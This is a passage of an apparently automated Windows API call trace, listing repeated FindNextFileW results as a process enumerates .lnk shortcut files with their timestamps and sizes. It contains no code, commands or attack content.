ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x9d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="dNMC XdC2fS1.lnk", cAlternateFileName="DNMCXD~1.LNK")) returned 1 [0094.464] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0ba20c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0ba20c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0bc8220, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xe02, dwReserved0=0x0, dwReserved1=0x0, cFileName="Duc5tpM3PDmAXr1.ots.lnk", cAlternateFileName="DUC5TP~1.LNK")) returned 1 [0094.464] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd167e520, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd167e520, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd167e520, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x97c, dwReserved0=0x0, dwReserved1=0x0, cFileName="DZ5O.lnk", cAlternateFileName="")) returned 1 [0094.464] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf8970c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf8970c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcf8970c0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x9b3, dwReserved0=0x0, dwReserved1=0x0, cFileName="D_cm4s7fP.lnk", cAlternateFileName="D_CM4S~1.LNK")) returned 1 [0094.464] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0c3a640, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0c3a640, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0c3a640, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x130b, dwReserved0=0x0, dwReserved1=0x0, cFileName="E1l_XrQ6aMcGTT.lnk", cAlternateFileName="E1L_XR~1.LNK")) returned 1 [0094.464] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce5b2220, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd12ec420, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd12ec420, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xd6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="e4W8iO-jmf.lnk", cAlternateFileName="E4W8IO~1.LNK")) returned 1 [0094.464] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd009fb00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd009fb00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd009fb00, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x3ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="EGL9Rx1KXSqWh.mkv.lnk", cAlternateFileName="EGL9RX~1.LNK")) returned 1 [0094.464] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xced48840, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd116f660, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd116f660, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x11e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="eUSZ.lnk", cAlternateFileName="")) returned 1 [0094.464] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd14db600, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd14db600, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd14db600, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x9d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="gerLGhJ-J1Fq.lnk", cAlternateFileName="GERLGH~1.LNK")) returned 1 [0094.464] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0053840, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0053840, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0053840, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x2fd, dwReserved0=0x0, dwReserved1=0x0, cFileName="grD5c_7rsX_r-Az.lnk", cAlternateFileName="GRD5C_~1.LNK")) returned 1 [0094.464] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0caca60, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0caca60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0caca60, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x3c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="gV-dKx26kEi.pdf.lnk", cAlternateFileName="GV-DKX~1.LNK")) returned 1 [0094.465] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd160c100, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd160c100, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd160c100, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x98f, dwReserved0=0x0, dwReserved1=0x0, cFileName="GwoFAC.pdf.lnk", cAlternateFileName="GWOFAC~1.LNK")) returned 1 [0094.465] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd103eb60, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd103eb60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd103eb60, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xe3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Gym-mdc1iNSfM4mpMZh.swf.lnk", cAlternateFileName="GYM-MD~1.LNK")) returned 1 [0094.465] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1253ea0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1253ea0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1253ea0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x185d, dwReserved0=0x0, dwReserved1=0x0, cFileName="H-iXHNw3Q.lnk", cAlternateFileName="H-IXHN~1.LNK")) returned 1 [0094.465] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd16ca7e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd16ca7e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd16ca7e0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xf47, dwReserved0=0x0, dwReserved1=0x0, cFileName="H8WEhqDt-nLLYwL7w3.lnk", cAlternateFileName="H8WEHQ~1.LNK")) returned 1 [0094.465] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd11bb920, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd11bb920, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd11bb920, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x97c, dwReserved0=0x0, dwReserved1=0x0, cFileName="hoG8.lnk", cAlternateFileName="")) returned 1 [0094.465] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfbdcf00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfbdcf00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfbdcf00, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x983, dwReserved0=0x0, dwReserved1=0x0, cFileName="hTjop.lnk", cAlternateFileName="")) returned 1 [0094.465] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce5fe4e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1716aa0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1716aa0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x900, dwReserved0=0x0, dwReserved1=0x0, cFileName="hWvMFQJJJ.lnk", cAlternateFileName="HWVMFQ~1.LNK")) returned 1 [0094.465] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf9edd20, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf9edd20, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcf9edd20, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1d9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="IaDqH9.lnk", cAlternateFileName="")) returned 1 [0094.465] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0f80480, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0f80480, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0f80480, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x13b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IdqAQbUtMr09oklG_Ot.lnk", cAlternateFileName="IDQAQB~1.LNK")) returned 1 [0094.465] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0007580, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0007580, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0007580, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x316, dwReserved0=0x0, dwReserved1=0x0, cFileName="IoUNPPwfOO3o6JZNAZ0x.lnk", cAlternateFileName="IOUNPP~1.LNK")) returned 1 [0094.465] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd10d70e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd10d70e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd10d70e0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xe64, dwReserved0=0x0, dwReserved1=0x0, cFileName="iZ2B uOZ_oASw3v_9uGC.flv.lnk", cAlternateFileName="IZ2BUO~1.LNK")) returned 1 [0094.465] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfd7fe20, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfd7fe20, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfd7fe20, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x222, dwReserved0=0x0, dwReserved1=0x0, cFileName="j 99Z9MOpk.pdf.lnk", cAlternateFileName="J99Z9M~1.LNK")) returned 1 [0094.465] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd15e5fa0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd15e5fa0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd15e5fa0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x3e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="JhfS93kCXhB0dS47UXO.swf.lnk", cAlternateFileName="JHFS93~1.LNK")) returned 1 [0094.466] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd13386e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd13386e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd13386e0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xdf5, dwReserved0=0x0, dwReserved1=0x0, cFileName="jlPj6J.flv.lnk", cAlternateFileName="JLPJ6J~1.LNK")) returned 1 [0094.466] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1018a00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1018a00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1018a00, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x211, dwReserved0=0x0, dwReserved1=0x0, cFileName="JmY86mr.swf.lnk", cAlternateFileName="JMY86M~1.LNK")) returned 1 [0094.466] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd13aab00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd13aab00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd13aab00, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x205, dwReserved0=0x0, dwReserved1=0x0, cFileName="jNMMi.ots.lnk", cAlternateFileName="JNMMIO~1.LNK")) returned 1 [0094.466] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0d6b140, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0d6b140, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0d6b140, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xed4, dwReserved0=0x0, dwReserved1=0x0, cFileName="jo7Fjz3qQw1.lnk", cAlternateFileName="JO7FJZ~1.LNK")) returned 1 [0094.466] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf740460, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd13386e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd13386e0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x92c, dwReserved0=0x0, dwReserved1=0x0, cFileName="jvuGC2saBZF J.lnk", cAlternateFileName="JVUGC2~1.LNK")) returned 1 [0094.466] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd10fd240, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd10fd240, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd10fd240, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xe32, dwReserved0=0x0, dwReserved1=0x0, cFileName="jvxZB--pZ8D4tDAf.lnk", cAlternateFileName="JVXZB-~1.LNK")) returned 1 [0094.466] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd14db600, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd14db600, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd14db600, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1358, dwReserved0=0x0, dwReserved1=0x0, cFileName="k3 HQLaJEyY.lnk", cAlternateFileName="K3HQLA~1.LNK")) returned 1 [0094.466] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd135e840, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd135e840, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd135e840, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x211, dwReserved0=0x0, dwReserved1=0x0, cFileName="kbuOLBA.swf.lnk", cAlternateFileName="KBUOLB~1.LNK")) returned 1 [0094.466] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1716aa0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1716aa0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1716aa0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xdf7, dwReserved0=0x0, dwReserved1=0x0, cFileName="kpu4EiFJZv7i.swf.lnk", cAlternateFileName="KPU4EI~1.LNK")) returned 1 [0094.466] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0c144e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0c144e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0c144e0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x13c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="kxX8q7znVEV6F AiDQyX.lnk", cAlternateFileName="KXX8Q7~1.LNK")) returned 1 [0094.466] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf84ae00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf84ae00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcf84ae00, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xe9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="m66Nad.lnk", cAlternateFileName="")) returned 1 [0094.466] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfc4f320, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfc4f320, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfc4f320, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xe67, dwReserved0=0x0, dwReserved1=0x0, cFileName="MADiRK5BENdO7pHH.flv.lnk", cAlternateFileName="MADIRK~1.LNK")) returned 1 [0094.466] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1312580, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1312580, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1312580, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xe1c, dwReserved0=0x0, dwReserved1=0x0, cFileName="miKlgwo4kuAJyz.lnk", cAlternateFileName="MIKLGW~1.LNK")) returned 1 [0094.466] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0fa65e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0fa65e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0fa65e0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x9ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="MKqMrJd2GayW Iyftd.ots.lnk", cAlternateFileName="MKQMRJ~1.LNK")) returned 1 [0094.466] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd12ec420, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd12ec420, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd12ec420, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1337, dwReserved0=0x0, dwReserved1=0x0, cFileName="mlVaW3l8E0FMzi-R4q.lnk", cAlternateFileName="MLVAW3~1.LNK")) returned 1 [0094.467] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfb90c40, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfb90c40, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfb90c40, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x200, dwReserved0=0x0, dwReserved1=0x0, cFileName="mvpq.lnk", cAlternateFileName="")) returned 1 [0094.467] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfc03060, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfc03060, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfc03060, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x24f, dwReserved0=0x0, dwReserved1=0x0, cFileName="mxWMxpSlb1Z2y3xfhO0.swf.lnk", cAlternateFileName="MXWMXP~1.LNK")) returned 1 [0094.467] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce885c40, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd06df4c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd06df4c0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x4f3, dwReserved0=0x0, dwReserved1=0x0, cFileName="My Music.lnk", cAlternateFileName="MYMUSI~1.LNK")) returned 1 [0094.467] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0588860, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0a97720, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0a97720, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x518, dwReserved0=0x0, dwReserved1=0x0, cFileName="My Pictures.lnk", cAlternateFileName="MYPICT~1.LNK")) returned 1 [0094.467] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfaac400, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1632260, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1632260, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x4fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="My Videos.lnk", cAlternateFileName="MYVIDE~1.LNK")) returned 1 [0094.467] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1207be0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1207be0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1207be0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x992, dwReserved0=0x0, dwReserved1=0x0, cFileName="No5ewLi.lnk", cAlternateFileName="")) returned 1 [0094.467] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd01f6760, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0ff28a0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0ff28a0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x122b, dwReserved0=0x0, dwReserved1=0x0, 